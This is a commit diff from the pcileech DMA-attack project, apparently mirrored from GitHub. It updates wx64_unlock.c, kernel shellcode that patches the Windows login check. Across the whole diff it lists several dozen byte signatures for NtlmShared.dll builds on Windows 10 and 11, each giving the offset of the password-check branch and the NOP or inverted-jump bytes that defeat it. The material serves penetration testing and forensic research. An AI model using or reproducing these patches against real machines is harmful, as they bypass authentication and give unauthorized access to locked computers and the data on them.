lywsvip/pcileech
1
0
Fork 0
mirror of https://github.com/ufrisk/pcileech.git synced 2026-06-08 18:42:55 +08:00
Code Issues Packages Projects Releases Wiki Activity

Version 4.17.5

Browse Source
This commit is contained in:
Ulf Frisk
2023-11-26 17:16:40 +01:00
parent c472737692
commit 00eff8c8d1
7 changed files with 283 additions and 133 deletions
Download Patch File Download Diff File Expand all files Collapse all files

264
pcileech_shellcode/wx64_unlock.c
View File

@@ -94,7 +94,7 @@ VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUNCTIONS2
typedef struct tdSignatureChunk {
WORD cbOffset;
BYTE cb;
BYTE pb[6];
BYTE pb[12];
} SIGNATURE_CHUNK, *PSIGNATURE_CHUNK;
typedef struct tdSignature {
@@ -129,10 +129,10 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages
return E_FAIL;
}
#define NUMBER_OF_SIGNATURES 20
#define NUMBER_OF_SIGNATURES 31
NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
{
SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = {
SIGNATURE oSigs[] = {
// win8.1x64 msv1_0.dll (2014-10-29)
{ .chunk = {
{ .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x42, 0xA4 } },
@@ -151,110 +151,192 @@ NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
{ .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xB2, 0xB9 } },
{ .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384]
// AUTO-GENERATED SIGNATURES BELOW:
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30]
{ .chunk = {
{ .cbOffset = 0x5df,.cb = 4,.pb = { 0xff, 0x15, 0x4b, 0x1c } },
{ .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } },
{ .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x5DC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x4B, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x5E8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x5E8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04]
{ .chunk = {
{ .cbOffset = 0x62f,.cb = 4,.pb = { 0xff, 0x15, 0xb3, 0x1b } },
{ .cbOffset = 0x638,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } },
{ .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x65C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xCB, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x668,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x668,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30]
{ .chunk = {
{ .cbOffset = 0x6df,.cb = 4,.pb = { 0xff, 0x15, 0xd3, 0x1b } },
{ .cbOffset = 0x6e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } },
{ .cbOffset = 0x6e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x66C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xBB, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x678,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x678,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-02-06)/10.0.14393.2791]
{.chunk = {
{.cbOffset = 0x6f5,.cb = 6,.pb = { 0x49, 0x3B, 0xC6, 0x0F, 0x85, 0x18 } },
{.cbOffset = 0x6fb,.cb = 5,.pb = { 0x0FB, 0xFF, 0xFF, 0xB8, 0x01 } },
{.cbOffset = 0x6f9,.cb = 1,.pb = { 0x84 } } }
},
// Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.10586.0 / 2015-10-30]
{ .chunk = {
{ .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } },
{ .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
{ .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x62C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB3, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x638,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106]
{.chunk = {
{.cbOffset = 0x625,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } },
{.cbOffset = 0x62e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
{.cbOffset = 0x62e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.0 / 2016-07-16]
{ .chunk = {
{ .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xd5, 0x1c } },
{ .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
{ .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
{ .cbOffset = 0x6DC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD3, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x6E8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x6E8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1]
{ .chunk = {
{ .cbOffset = 0x695,.cb = 4,.pb = { 0xff, 0x15, 0x55, 0x1c } },
{ .cbOffset = 0x69e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } },
{ .cbOffset = 0x69e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-10-02)/10.0.17134.1067]
{.chunk = {
{.cbOffset = 0x6ab,.cb = 6,.pb = { 0x49, 0x3B, 0xC6, 0x0F, 0x85, 0x2E } },
{.cbOffset = 0x6b1,.cb = 5,.pb = { 0xFB, 0xFF, 0xFF, 0xB0, 0x01 } },
{.cbOffset = 0x6af,.cb = 1,.pb = { 0x84 } } }
},
// Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1]
{.chunk = {
{.cbOffset = 0x740,.cb = 4,.pb = { 0xff, 0x15, 0xb2, 0x1b } },
{.cbOffset = 0x749,.cb = 4,.pb = { 0x0f, 0x84, 0x0b, 0xfb } },
{.cbOffset = 0x749,.cb = 2,.pb = { 0x0f, 0x85 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-03-19)/10.0.18362.1]
// Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418]
{.chunk = {
{.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } },
{.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } },
{.cbOffset = 0x741,.cb = 2,.pb = { 0xb0, 0x01 } } }
},
// Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1]
{.chunk = {
{.cbOffset = 0x426,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x53, 0x20 } },
{.cbOffset = 0x435,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
{.cbOffset = 0x435,.cb = 2,.pb = { 0x0f, 0x85 } } }
},
// Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889]
{.chunk = {
{.cbOffset = 0x4B6,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xc3, 0x1f } },
{.cbOffset = 0x4c5,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
{.cbOffset = 0x4c5,.cb = 2,.pb = { 0x0f, 0x85 } } }
},
// Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887]
{.chunk = {
{.cbOffset = 0xa6e,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xb3, 0x28 } },
{.cbOffset = 0xa7d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
{.cbOffset = 0xa7d,.cb = 2,.pb = { 0x0f, 0x85 } } }
},
// Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29]
{ .chunk = {
{.cbOffset = 0xf8b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
{.cbOffset = 0xf9d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
{.cbOffset = 0xf9d,.cb = 2,.pb = { 0x0f, 0x85 } } }
{ .cbOffset = 0x6EC,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC3, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x6F8,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x6F8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07]
{ .chunk = {
{.cbOffset = 0x00b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
{.cbOffset = 0x01d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
{.cbOffset = 0x01d,.cb = 2,.pb = { 0x0f, 0x85 } } }
{ .cbOffset = 0x76C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x43, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x778,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x778,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382]
// Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30]
{ .chunk = {
{.cbOffset = 0xFBD,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x3c, 0x23 } },
{.cbOffset = 0xFCC,.cb = 6,.pb = { 0x0f, 0x85, 0xc4, 0xfa, 0xff, 0xff } },
{.cbOffset = 0xFCC,.cb = 2,.pb = { 0x0f, 0x85 } } }
{ .cbOffset = 0x77C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x33, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x788,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x788,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.2106 / 2019-09-30]
{ .chunk = {
{ .cbOffset = 0x622,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB5, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x62E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x62E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.15254.245 / 2018-01-30]
{ .chunk = {
{ .cbOffset = 0x612,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x61E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x61E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1268 / 2019-07-05]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02]
{ .chunk = {
{ .cbOffset = 0x622,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x62E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x62E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.192 / 2018-01-01]
{ .chunk = {
{ .cbOffset = 0x612,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD5, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x61E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x61E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.590 / 2019-02-06]
{ .chunk = {
{ .cbOffset = 0x6A2,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x45, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x6AE,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x6AE,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.523 / 2019-01-01]
{ .chunk = {
{ .cbOffset = 0x692,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x55, 0x1C, 0x00, 0x00 } },
{ .cbOffset = 0x69E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x69E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05]
{ .chunk = {
{ .cbOffset = 0x7CD,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x22, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x7D9,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x7D9,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.194 / 2018-12-04]
{ .chunk = {
{ .cbOffset = 0x73D,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB2, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x749,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x749,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.316 / 2019-02-06]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.802 / 2019-10-02]
{ .chunk = {
{ .cbOffset = 0x74D,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xA2, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x759,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x759,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.5122 / 2023-11-08]
{ .chunk = {
{ .cbOffset = 0x7DD,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x12, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x7E9,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x7E9,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.1 / 2019-03-18]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.10022 / 2019-09-15]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.418 / 2019-10-06]
{ .chunk = {
{ .cbOffset = 0x72F,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC0, 0x1B, 0x00, 0x00 } },
{ .cbOffset = 0x73B,.cb = 6,.pb = { 0x0F, 0x84, 0x09, 0xFB, 0xFF, 0xFF } },
{ .cbOffset = 0x73B,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.1 / 2019-12-07]
{ .chunk = {
{ .cbOffset = 0x423,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x53, 0x20, 0x00, 0x00 } },
{ .cbOffset = 0x435,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x435,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2728 / 2023-03-09]
{ .chunk = {
{ .cbOffset = 0x4B3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xC3, 0x1F, 0x00, 0x00 } },
{ .cbOffset = 0x4C5,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x4C5,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3636 / 2023-10-20]
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3684 / 2023-10-17]
{ .chunk = {
{ .cbOffset = 0x4C3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xB3, 0x1F, 0x00, 0x00 } },
{ .cbOffset = 0x4D5,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x4D5,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.1668 / 2023-03-30]
{ .chunk = {
{ .cbOffset = 0xA7B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xA3, 0x28, 0x00, 0x00 } },
{ .cbOffset = 0xA8D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0xA8D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04]
{ .chunk = {
{ .cbOffset = 0xA6B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xB3, 0x28, 0x00, 0x00 } },
{ .cbOffset = 0xA7D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0xA7D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.1696 / 2023-03-09]
{ .chunk = {
{ .cbOffset = 0x00B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xE3, 0x22, 0x00, 0x00 } },
{ .cbOffset = 0x01D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x01D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.2600 / 2023-11-08]
{ .chunk = {
{ .cbOffset = 0x01B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xD3, 0x22, 0x00, 0x00 } },
{ .cbOffset = 0x02D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0x02D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.778 / 2022-06-18]
{ .chunk = {
{ .cbOffset = 0xF8B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x63, 0x23, 0x00, 0x00 } },
{ .cbOffset = 0xF9D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0xF9D,.cb = 2,.pb = { 0x0F, 0x85 } } }
},
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2067 / 2023-07-11]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2506 / 2023-10-19]
// Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2567 / 2023-10-14]
{ .chunk = {
{ .cbOffset = 0xFC9,.cb = 11,.pb = { 0x48, 0x8D, 0x4B, 0x10, 0x48, 0xFF, 0x15, 0x2C, 0x23, 0x00, 0x00 } },
{ .cbOffset = 0xFDC,.cb = 6,.pb = { 0x0F, 0x85, 0xC4, 0xFA, 0xFF, 0xFF } },
{ .cbOffset = 0xFDC,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } }
},
};
KERNEL_FUNCTIONS2 fnk2;
PPHYSICAL_MEMORY_RANGE pMemMap, pMM;